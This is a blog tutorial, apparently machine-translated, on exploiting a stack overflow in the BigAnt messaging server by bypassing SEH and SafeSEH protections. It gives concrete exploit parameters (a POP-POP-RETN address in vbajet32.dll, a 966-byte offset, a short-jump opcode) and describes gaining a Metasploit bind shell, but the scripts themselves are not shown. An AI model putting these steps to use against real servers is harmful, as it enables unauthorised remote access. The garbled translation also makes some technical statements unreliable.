at this time the post will discuss how to exploit on an application that has a protection against buffer overflow attacks. on this application, in its memory system has had a protection called SEH and SafeSEH. applications will be in trial is BigAnt server.
BigAnt server is a server application messaging, which banyakdigunakan in office. BigAnt suitable to serve as an example because the application is compiled (created) using SEH and SafeSEH linker, which makes these applications are not easily exploited using direct methods RETN EIP as the application server WarFTP
fuzzing
here will be used fuzzer that is made specifically to try BigAnt server applications. application fuzzer at this time, which will be tested for fuzzing is the command "USV" owned by BigAnt server. BigAnt run the application server, and then attach to the process antserver.exe Immunity Debugger. for the record, in contrast to when doing fuzzing on WarFTP server, on BigAnt server, either Immunity Debugger and BigAnt server must be restarted (on restart) every time out doing fuzzing.
Script on fuzzer
images of Immunity Debugger
AntServer.exe attach images to Immunity Debugger
after antserver.exe aktive and already run out, I'll send a fuzzer with the following command
# Python evil2.py
AntServer.exe picture when fuzzer has been sent to the Immunity Debugger
notice what happens to the system memory in the application
application crashes, However this time unlike the previous case, the EIP register are not affected by the buffer are sent. This is because the application uses SEH, which will catch the exception that occurs in application. To look into the SEH, select the View → SEH chain
seen clearly that the buffer being sent is stored in the SEH chain. To forward data from the SEH chain into memory, press shift + F9. Now consider that the value of EIP to 41414141.
if the note on the third row of the window stack Immunity Debugger (bottom right), it appears that the buffer is sent using a fuzzer has been entered into the stack. This address is also band is used as an entry point into the memory address of the buffer is sent. To view the data inside the memory application, right-click on the row stack → Follow in Dump, Dump the memory window Immunity Debugger (for bottom left) will appear in the data buffer memory
as mentioned earlier, there are several ways to overcome SEH protection, and the most popular method is to use POP, POP, RETN. Basically, in the memory stack is a memory structure consisting of 32bit (4 bytes) virtual file. POP command will discard the top value of the virtual file into another register in the memory, and to perform two POP command will remove a whole two stacks stack and leave the stack to three with RETN command. RETN command will be the first stack on the stack, so that the system will start the next command depends on the memory address that is on RETN.
If SEH address overwritten with an address that leads into the command POP, POP, RETN in the memory, the control command execution in the CPU can be controlled easily, such as direct control of EIP. The problem is, there is a more protection held by the windows to protect the SEH buffer overflow attacks are SafeSEH
more deeply about SafeSEH
in the operating system Windows XP SP2 and Windows Server 2003, Microsoft created a new safeguards for the use of exception handlers called SafeSEH. In general SafeSEH linker can only be used when compiling an application on the Windows system. When SafeSEH option is used, the application will make such tabeh memory address in the system itself, which will record the address of SEH Handler, which will be used when the module runs SEH.
This means, in case of exploitation of the SEH using POP, POP, RETN, the address used to redirect SEH into the address POP, POP, RETN will not work, because it is not contained in the table SafeSEH application, and exploitation will fail .
Besides using SafeSEH, Windows XP also has other protection planted in his file, etc. ie use IMAGE_DLLCHARACHTERISTICS_NO_SEH features. If a file etc using this feature, it will prevent the use of any address inside the dll file to be used as an SEH handler. For example if in the dll file there is a command POP, POP, RETN.
There are several approaches to circumvent these two types of protection, namely:
- Use the address that will be used as a stepping stone in mengoverwrite SEH of the module or the files are not compiled using the option / SafeSEH and IMAGE_DLLCHARACTERISTICS_NO_SEH. Usually the library files of third-party-application is not compiled using the above two things.
- Using instructions from a memory address that is expected in which there is a command POP, POP, RETN, which the library files are located outside of the application
- Uses memory addresses inside the HEAP
- Use an address that has been registered handler to execute overwrite the SEH address. But usually this will cause the use of exploits to be less than the maximum, because often the cause of failure.
- The operating system Windows Server 2003 (for versions prior to SP1), it is still possible to use the module as a springboard to ATL.dll mengoverwrite SEH address, but the version of SP1 to the above, this was not done.
Finding Addresses "Stepping Stone"
is looking for a stepping stone is, find an address in which commands stored POP, RETN POP which will address will be used to overwrite the SEH address application
in this discussion, I will use the first method, is to look for the module in applications that do not have IMAGE_DLLCHARAHTERISTICS_NO_SEH and also compiled module to look like this, namely:
- Use Immunity Debugger plugins are made to look SafeSEH option on module, which ImmunitySSEH
- The manual way to check a string of modules used by the application, if it contains two of the above.
If you use the first option, Immunity Debugger will automatically do the reading to all modules used by the application to run and seek protection in the two strings, is contained in the module or not. Later Immunity Debugger will automatically tell whether two such option is ON or OFF. If you have found a module that uses the option is OFF, the next step is looking at the module, run the command address POP, POP RETN.
The second is to look for it manually from each module that is used to run applications. To see what modules used by the application to run, use the menu View → Executable Modules. Later, after determining which modules can roughly be used as a springboard, the process will continue to utilize msfpescan, which is one of the Metasploit tool that is used to read the contents of a module if there are two such protection in it. If it is found the next step is to try to overwrite the SEH address
once again the authors caution that, there are two things that must be ascertained in a module that can be used as a stepping stone to overwrite SEH address, ie
- Module is not compiled using SafeSEH ON
- Module does not have or use the option flag IMAGE_DLLCHARACTERISTICS_NO_SEH in it. DLLCHARACHTERISTICS usually represented with code 0x0400
common module that does not have both of the above is a module which is included in third party etc. who are not native (Sally) comes from Windows. And these modules are usually stored in the same folder as the application.
But in case, BigAnt server does not have the module files etc. in the application folder. The next stage is to look for etc that are not installed by default in the Windows system. There is no special science to figure this out, it takes only a general knowledge about Windows and frequently tested. The most classic way is to try all the modules that are used by BigAnt server, yes indeed this method is very manual and time, but this is where lies the "art" of vulnerability development, which is patient and thorough.
Well, for mempersingkan, the authors chose a file that is not installed in the standard Windows system, the file vbajet32.dll. Copy the file into the system vbajet32.dll Backtrack, for the further analysis. File copy process can take advantage of, the features of existing shared folders on VirtualBox.
Once the file is copied into the vbajet32.dll ter Backtrack system, here the writer keep it in the / tmp folder, then run the tool msfpescan phases present in metasploit. Go to the folder that metasploit on backtrack / opt/metasploit/msf3 /. Here the authors use backtrack 5 R3. And run the following command:
the above command will do the reading function DLLCHARACHTERISTICS inside vbajet32.dll method. As discussed earlier, which is required of this file is the certainty that there is no value 0x0400 in it. This value is the hex value of the protection SEH whose value is stored in the binary value of the third bit of the second byte hex value. So in general it can be concluded that if the value of bits in the second byte contains the value it can be sure that the file in the module can not be used to overwrite SEH. Avoided value is 4,5,6,7, C, E and F. the second byte is indicated with the letter B (0x0B00).
It appears that the value of bits in the second byte, value 0, which means that this module has no protection or SafeSEH SEH in it. This means, vbajet32.dll file can be used as a springboard for Meng SEH overwrite address on BigAnt server applications.
Here lies the vbajet32.dll
The next step is to find the location of the command POP, POP, RETN in this module. To do it can use help Immunity Debugger. Of Immunity Debugger → View → Execute → Modules vbajet32.dll double click on the file, go to the Window CPU from vbajet32.dll file, right-click → Search For → Sequence of Commands.
Next a search window will appear, enter the POP r32, r32 RETN POP on search input
Immunity Debugger will point to a memory address in a file that has a series of commands vbajet32.dll POP, POP, RETN. Where the value of POP is characterized by the use of prefix 32bit r32 to search. Now Immunity Debugger has found the address in the memory vbajet32.dll, namely the offset 0F9A196A
to note the offset address does not contain the value \ x00, \ x0a and \ x0d. So later when using the exploit payload, payload command will not break up because of three characters did, which led to exploitation fail.
Looking offset to overwrite SEH
vbajet32.dll after ensuring that the file can be used as a stepping stone in the process of SEH overwrite address, the next process is to find the byte into how in the buffer, ter SEH overwrite address. As before, this process will be used pattern_create the Metasploit tools to create a string pattern that will be buffered on the application fuzzer.
Now close BigAnt Immunity Debugger and application server, then run the application BigAnt server then Immunity Debugger, and then attach the AntServer into Immunity Debugger. Run the application of Immunity Debugger. Run the application fuzzer that has been filled using the pattern. BigAnt will form the crash, such as early entrance into the SEH chain and press F9 to pass him by SEH, record values in the EIP register. Check using pattern_offset.
After using pattern_offset obtained the following values
Her conclusion is needed value buffer of 966 bytes to trigger SEH handler. Next are still using the same application fuzzer, change the value of a 966 byte buffer to see if his calculations are correct
note the script used by the writer. Here the author tries to turn a four-byte buffer \ xCC before buffer achieve the SEH address, which will be overwritten with the value \ X41. His next restart Immunity Debugger and BigAnt Server, then run again fuzzer.
This time, Immunity Debugger shows that BigAnt crashes and the memory access violation occurs, look at the SEH chain, value buffer \ X41 successful societal into the SEH handler. This indicates that the byte buffer calculations are correct and as expected.
Controlling the CPU
after getting the address byte is used for fishing SEH, now is his time to enter the address of the offset of having command vbajet32.dll POP, POP, RETN into the fuzzer. Do not forget to change the format of the memory into the little-endian.
Before running the application fuzzer, it's good to make a breakpoint on memory address SEH, this is done to ascertain whether the exploits that made tekah actually leads to the correct address. Restart Immunity Debugger and BigAnt server, install breakpoint at address in module vbajet32.dll 0F9A196A, do ctrl + G
after that run the application fuzzer.
It appears that the process by Immunity debuger break right when going to access the address on file vbajet32.dll 0F9A196A. To check, take a look at the table SEH chain or Alt + S
press shift + F9 to continue the process into the memory vbajet32.dll. Press F7 to reach RETN command. Immunity debuger will bring the process into the stack location in memory
problem arises, there is only a memory space of four bytes only. Four bytes of data are not enough to save a shellcode. Therefore we need another process to move the location to the address you have more memory space. To find the memory address that has a larger memory space right click on the first address of \ xCC (0160FD7D) → → Follow in Dump Selection. Then Immunity Debugger will point to the stack memory in the memory (at the bottom left of the window Immunity Debugger).
It appears that, under the memory address \ xCC are empty memory space is very large (\ X90) starting from memory address 0160FD85. With a bit of calculation can be seen that the large amount of empty space in the memory by subtracting the value at the beginning of the last address memory 0160FD85 0160FFFD generate value 0x27B or 635 in decimal. Alternatively, you can see the empty space before \ xCC that of address 0160F138 0160F000 go up to that, if computed at 0x3C1 or $ 961 in decimal. Both space is adequate to accommodate the shellcode used.
To deploy the CPU of four bytes into a blank space followed by the command SEH overwrite address, you can use the command JMP SHORT. JMP SHORT command is used to instruct the CPU to jump forward to the next few bytes accordance entered by the user, and then the CPU will start the process of execution of the address.
In assembly language programming JMP SHORT has opcode \ xEB \ xZZ, where ZZ is the value of byte values entered by the user. If the user input \ xEB \ X02 then the CPU will jump 2 bytes following his instructions and start from that point.
To be able to drive to the address of the stack takes a leap of 8 bytes. 8-byte value that is to pass 4 bytes and 4 bytes more SEH is in addition to filling the remaining 4 bytes of opcode \ xEB \ x08. So later opcode value that is to be \ xEB \ x08 \ X90 \ X90. Next is to make using Metasploit shellcode.
make shellcode
in the present case, the writer uses the target system shellcode will open port 4444 on his system. Remember that big empty space there is byte 635 byte subtract 16 bytes for the empty space before entering into the initial shellcode. Use re-generate msfweb to download payload (shellcode)
author using Windows Bind Shell, with 4444 PORT configuration, ports are used to connect, this port can be changed by using common ports running on Windows systems such as 443, 80, 22, and his other as a form of camouflage. Encoder by default using ShikataGaNai. Here are his results.
Following his input payload, 16 bytes NOP JMP SHORT and his command into the fuzzer, and try running the application in the system exploits BigAnt server.
Before running the application fuzzer, verify that the memory address SEH has been installed on the Immunity Debugger breakpoint. This is done to see if the exploitation process works as expected. Run the application fuzzer and watch what happens.
Here we can see that the SEH storing the correct value, because it leads to the SEH vbajet32.dll
then we send the application fuzzer, and the backtrack 5 R3 we open termilal and type the following command
and now we've been in windows system with BigAnt Server applications.
Good Luck
0 comments:
Post a Comment